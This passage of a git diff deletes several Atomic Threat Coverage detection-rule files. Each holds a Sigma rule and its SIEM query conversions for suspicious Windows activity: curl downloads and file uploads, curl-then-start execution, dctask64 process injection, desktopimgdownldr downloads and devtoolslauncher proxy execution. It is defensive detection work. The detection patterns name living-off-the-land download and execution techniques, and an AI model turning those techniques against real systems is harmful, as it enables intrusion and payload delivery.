-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Curl Usage on Windows'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\curl.exe OR Product:"The curl executable") AND CommandLine.keyword:* \-O *)
-```
-
-
-### splunk
-    
-```
-((Image="*\\curl.exe" OR Product="The curl executable") CommandLine="* -O *") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\curl.exe" OR Product="The curl executable") CommandLine="* -O *")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*.*\curl\.exe|.*The curl executable)))(?=.*.* -O .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_fileupload.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_fileupload.md
deleted file mode 100644
index dd489d9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_fileupload.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Suspicious Curl File Upload       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious curl process start the adds a file to a web request |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1105: Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1105: Ingress Tool Transfer](../Triggers/T1105.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Scripts created by developers and admins</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/d1r4c/status/1279042657508081664](https://twitter.com/d1r4c/status/1279042657508081664)</li><li>[https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76](https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Curl File Upload
-id: 00bca14a-df4e-4649-9054-3f2aa676bc04
-status: experimental
-description: Detects a suspicious curl process start the adds a file to a web request
-author: Florian Roth
-date: 2020/07/03
-references:
-    - https://twitter.com/d1r4c/status/1279042657508081664
-    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
-logsource:
-    category: process_creation
-    product: windows
-tags:
-    - attack.defense_evasion
-    - attack.t1105
-detection:
-    selection:
-        Image|endswith: '\curl.exe'
-        CommandLine|contains: ' -F '
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Scripts created by developers and admins
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\curl.exe" -and $_.message -match "CommandLine.*.* -F .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\curl.exe AND winlog.event_data.CommandLine.keyword:*\ \-F\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/00bca14a-df4e-4649-9054-3f2aa676bc04 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Curl File Upload",
-    "description": "Detects a suspicious curl process start the adds a file to a web request",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1105"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\curl.exe AND winlog.event_data.CommandLine.keyword:*\\ \\-F\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\curl.exe AND winlog.event_data.CommandLine.keyword:*\\ \\-F\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Curl File Upload'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\curl.exe AND CommandLine.keyword:* \-F *)
-```
-
-
-### splunk
-    
-```
-(Image="*\\curl.exe" CommandLine="* -F *") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\curl.exe" CommandLine="* -F *")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\curl\.exe)(?=.*.* -F .*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_start_combo.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_start_combo.md
deleted file mode 100644
index 7698c57..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_curl_start_combo.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Curl Start Combination       |
-|:-------------------------|:------------------|
-| **Description**          | Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrative scripts (installers)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983](https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983)</li></ul>  |
-| **Author**               | Sreeman |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Curl Start Combination
-id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
-status: experimental
-description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
-references: 
-    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983
-author: Sreeman
-date: 2020/01/13
-tags:
-    - attack.execution
-    - attack.t1218
-logsource:
-   category: process_creation
-   product: windows
-detection:
-  condition: selection
-  selection:
-      CommandLine|contains: 'curl* start '
-falsepositives:
-    - Administrative scripts (installers)
-fields:
-    - ParentImage
-    - CommandLine
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*curl.* start .*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*curl*\ start\ *
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/21dd6d38-2b18-4453-9404-a0fe4a0cc288 <<EOF
-{
-  "metadata": {
-    "title": "Curl Start Combination",
-    "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.",
-    "tags": [
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*curl*\\ start\\ *"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*curl*\\ start\\ *",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Curl Start Combination'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nParentImage = {{_source.ParentImage}}\nCommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*curl* start *
-```
-
-
-### splunk
-    
-```
-CommandLine="*curl* start *" | table ParentImage,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*curl* start *")
-```
-
-
-### grep
-    
-```
-grep -P '^.*curl.* start .*'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dctask64_proc_inject.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_dctask64_proc_inject.md
deleted file mode 100644
index 969991f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dctask64_proc_inject.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | ZOHO Dctask64 Process Injection       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious process injection using ZOHO's dctask64.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown yet</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/gN3mes1s/status/1222088214581825540](https://twitter.com/gN3mes1s/status/1222088214581825540)</li><li>[https://twitter.com/gN3mes1s/status/1222095963789111296](https://twitter.com/gN3mes1s/status/1222095963789111296)</li><li>[https://twitter.com/gN3mes1s/status/1222095371175911424](https://twitter.com/gN3mes1s/status/1222095371175911424)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: ZOHO Dctask64 Process Injection
-id: 6345b048-8441-43a7-9bed-541133633d7a
-status: experimental
-description: Detects suspicious process injection using ZOHO's dctask64.exe
-references:
-    - https://twitter.com/gN3mes1s/status/1222088214581825540
-    - https://twitter.com/gN3mes1s/status/1222095963789111296
-    - https://twitter.com/gN3mes1s/status/1222095371175911424
-author: Florian Roth
-date: 2020/01/28
-tags:
-    - attack.defense_evasion
-    - attack.t1055
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\dctask64.exe'
-    filter:
-        CommandLine|contains:
-            - 'DesktopCentral_Agent\agent'
-    condition: selection and not filter
-fields:
-    - CommandLine
-    - ParentCommandLine
-    - ParentImage
-falsepositives:
-    - Unknown yet
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\dctask64.exe") -and  -not (($_.message -match "CommandLine.*.*DesktopCentral_Agent\\agent.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\dctask64.exe) AND (NOT (winlog.event_data.CommandLine.keyword:(*DesktopCentral_Agent\\agent*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6345b048-8441-43a7-9bed-541133633d7a <<EOF
-{
-  "metadata": {
-    "title": "ZOHO Dctask64 Process Injection",
-    "description": "Detects suspicious process injection using ZOHO's dctask64.exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1055"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\dctask64.exe) AND (NOT (winlog.event_data.CommandLine.keyword:(*DesktopCentral_Agent\\\\agent*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\dctask64.exe) AND (NOT (winlog.event_data.CommandLine.keyword:(*DesktopCentral_Agent\\\\agent*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'ZOHO Dctask64 Process Injection'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n      ParentImage = {{_source.ParentImage}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\dctask64.exe) AND (NOT (CommandLine.keyword:(*DesktopCentral_Agent\\agent*))))
-```
-
-
-### splunk
-    
-```
-((Image="*\\dctask64.exe") NOT ((CommandLine="*DesktopCentral_Agent\\agent*"))) | table CommandLine,ParentCommandLine,ParentImage
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\dctask64.exe"]  -(CommandLine IN ["*DesktopCentral_Agent\\agent*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\dctask64\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*.*DesktopCentral_Agent\agent.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_desktopimgdownldr.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_desktopimgdownldr.md
deleted file mode 100644
index ade5889..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_desktopimgdownldr.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Suspicious Desktopimgdownldr Command       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1105: Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1105: Ingress Tool Transfer](../Triggers/T1105.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/](https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/)</li><li>[https://twitter.com/SBousseaden/status/1278977301745741825](https://twitter.com/SBousseaden/status/1278977301745741825)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Desktopimgdownldr Command
-id: bb58aa4a-b80b-415a-a2c0-2f65a4c81009
-status: experimental
-description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
-author: Florian Roth
-date: 2020/07/03
-references:
-    - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
-    - https://twitter.com/SBousseaden/status/1278977301745741825
-logsource:
-    category: process_creation
-    product: windows
-tags:
-    - attack.defense_evasion
-    - attack.t1105
-detection:
-    selection1:
-        CommandLine|contains: ' /lockscreenurl:'
-    selection1_filter:
-        CommandLine|contains:
-            - '.jpg'
-            - '.jpeg'
-            - '.png'
-    selection_reg:
-        CommandLine|contains|all:
-            - 'reg delete'
-            - '\PersonalizationCSP'
-    condition: ( selection1 and not selection1_filter ) or selection_reg
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.ID -eq "1" -and $_.message -match "CommandLine.*.* /lockscreenurl:.*" -and  -not (($_.message -match "CommandLine.*.*.jpg.*" -or $_.message -match "CommandLine.*.*.jpeg.*" -or $_.message -match "CommandLine.*.*.png.*"))) -or ($_.message -match "CommandLine.*.*reg delete.*" -and $_.message -match "CommandLine.*.*\\PersonalizationCSP.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.CommandLine.keyword:*\ \/lockscreenurl\:* AND (NOT (winlog.event_data.CommandLine.keyword:(*.jpg* OR *.jpeg* OR *.png*)))) OR (winlog.event_data.CommandLine.keyword:*reg\ delete* AND winlog.event_data.CommandLine.keyword:*\\PersonalizationCSP*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/bb58aa4a-b80b-415a-a2c0-2f65a4c81009 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Desktopimgdownldr Command",
-    "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1105"
-    ],
-    "query": "((winlog.event_data.CommandLine.keyword:*\\ \\/lockscreenurl\\:* AND (NOT (winlog.event_data.CommandLine.keyword:(*.jpg* OR *.jpeg* OR *.png*)))) OR (winlog.event_data.CommandLine.keyword:*reg\\ delete* AND winlog.event_data.CommandLine.keyword:*\\\\PersonalizationCSP*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.CommandLine.keyword:*\\ \\/lockscreenurl\\:* AND (NOT (winlog.event_data.CommandLine.keyword:(*.jpg* OR *.jpeg* OR *.png*)))) OR (winlog.event_data.CommandLine.keyword:*reg\\ delete* AND winlog.event_data.CommandLine.keyword:*\\\\PersonalizationCSP*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Desktopimgdownldr Command'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((CommandLine.keyword:* \/lockscreenurl\:* AND (NOT (CommandLine.keyword:(*.jpg* *.jpeg* *.png*)))) OR (CommandLine.keyword:*reg delete* AND CommandLine.keyword:*\\PersonalizationCSP*))
-```
-
-
-### splunk
-    
-```
-((CommandLine="* /lockscreenurl:*" NOT ((CommandLine="*.jpg*" OR CommandLine="*.jpeg*" OR CommandLine="*.png*"))) OR (CommandLine="*reg delete*" CommandLine="*\\PersonalizationCSP*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((event_id="1" CommandLine="* /lockscreenurl:*"  -(CommandLine IN ["*.jpg*", "*.jpeg*", "*.png*"])) OR (CommandLine="*reg delete*" CommandLine="*\\PersonalizationCSP*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.* /lockscreenurl:.*)(?=.*(?!.*(?:.*(?=.*(?:.*.*\.jpg.*|.*.*\.jpeg.*|.*.*\.png.*))))))|.*(?:.*(?=.*.*reg delete.*)(?=.*.*\PersonalizationCSP.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_devtoolslauncher.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_devtoolslauncher.md
deleted file mode 100644
index 3cd7a98..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_devtoolslauncher.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Devtoolslauncher.exe Executes Specified Binary       |
-|:-------------------------|:------------------|
-| **Description**          | The Devtoolslauncher.exe executes other binary |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Legitimate use of devtoolslauncher.exe by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml)</li><li>[https://twitter.com/_felamos/status/1179811992841797632](https://twitter.com/_felamos/status/1179811992841797632)</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community (rule), @_felamos (idea) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Devtoolslauncher.exe Executes Specified Binary
-id: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6
-status: experimental
-description: The Devtoolslauncher.exe executes other binary
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml
-    - https://twitter.com/_felamos/status/1179811992841797632
-author: Beyu Denis, oscd.community (rule), @_felamos (idea)
-date: 2019/10/12
-modified: 2019/11/04
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1218
-level: critical
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\devtoolslauncher.exe'
-        CommandLine|contains: 'LaunchForDeploy'
-    condition: selection
-falsepositives:
-    - Legitimate use of devtoolslauncher.exe by legitimate user
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\devtoolslauncher.exe" -and $_.message -match "CommandLine.*.*LaunchForDeploy.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\devtoolslauncher.exe AND winlog.event_data.CommandLine.keyword:*LaunchForDeploy*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6 <<EOF
-{
-  "metadata": {
-    "title": "Devtoolslauncher.exe Executes Specified Binary",
-    "description": "The Devtoolslauncher.exe executes other binary",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\devtoolslauncher.exe AND winlog.event_data.CommandLine.keyword:*LaunchForDeploy*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\devtoolslauncher.exe AND winlog.event_data.CommandLine.keyword:*LaunchForDeploy*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Devtoolslauncher.exe Executes Specified Binary'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\devtoolslauncher.exe AND CommandLine.keyword:*LaunchForDeploy*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\devtoolslauncher.exe" CommandLine="*LaunchForDeploy*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\devtoolslauncher.exe" CommandLine="*LaunchForDeploy*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\devtoolslauncher\.exe)(?=.*.*LaunchForDeploy.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config.md
deleted file mode 100644
index 6e61385..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | DHCP Server Loaded the CallOut DLL       |
-|:-------------------------|:------------------|
